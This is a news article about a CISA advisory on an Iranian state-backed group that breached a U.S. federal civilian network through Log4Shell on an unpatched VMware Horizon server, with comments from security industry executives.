The U.S. Cybersecurity and Infrastructure Agency today disclosed that an Iranian government-sponsored advanced persistent threat group hacked the Federal Civilian Executive Branch.
The breach, which dates back to February, was first detected in mid-June, and CISA conducted an incident response engagement with the FCEB through mid-July.
The Iranian hackers gained access to the network through an unpatched VMware Horizon server using the Log4Shell vulnerability. Also known as Log4j, the vulnerability was first discovered in December last year. The Federal Trade Commission threatened in January that it would take legal action against companies that did not patch the vulnerability.
While one arm of government was threatening businesses, the actual people in charge of cybersecurity never actually thought to practice what they preach and exposed dozens of agencies to hacking while they were asleep at the wheel. Ironically, the FTC is a member of the FCEB.
Having gained access, the unnamed Iranian hacking group installed the XMRig crypto-mining software, moved laterally to the domain controller, compromised credentials and then installed reverse proxies on several hosts to maintain persistence.
CISA had previously warned on June 23 that malicious cyber actors were continuing to exploit Log4Shell in VMware Horizon systems, but it was unknown at the time that it was specifically referring to the FCEB being hacked. The warning came days after they would have found that the FCEB had been compromised.
“CISA and FBI encourage all organizations with affected VMware systems that did not immediately apply available patches or workarounds to assume compromise and initiate threat-hunting activities,” the agency said in its latest alert today. “If suspected initial access or compromise is detected based on indicators of compromise or tactics, techniques and procedures described in this Cybersecurity Advisory, CISA and FBI encourage organizations to assume lateral movement by threat actors, investigate connected systems and audit privileged accounts”
Discussing the news, Brian Fox, chief technology officer of software supply chain security company Sonatype Inc., told SiliconANGLE that “our data shows that about 38% to 40% of all downloads of Log4j are still vulnerable to Log4Shell, so it’s not surprising that we continue to see APT groups use it as a part of their toolkit.”
Fox added that the advisory should serve as a warning to everyone in the industry, especially those in the federal government, not to lose sight of continuing to find straggling systems with potentially vulnerable versions. “That’s why software bill of materials and quality software composition analysis solutions are so important,” he said. “Developers and organizations need transparency into every element of their software supply chains for efficient fixes and to stay secure.”
Tom Kellermann, senior vice president of cyber strategy at application security software firm Contrast Security Inc., said the U.S. government is under siege by an axis of nation-states, all of which use exploits to bypass the perimeter defenses of agencies.
“The Iranian cyberspies exploited this open source vulnerability months after it was disclosed and subsequently burrowed into the agency network for four months before they were expelled,” Kellermann explained. “I am concerned that they might have used the agency network to island hop into other agency networks.”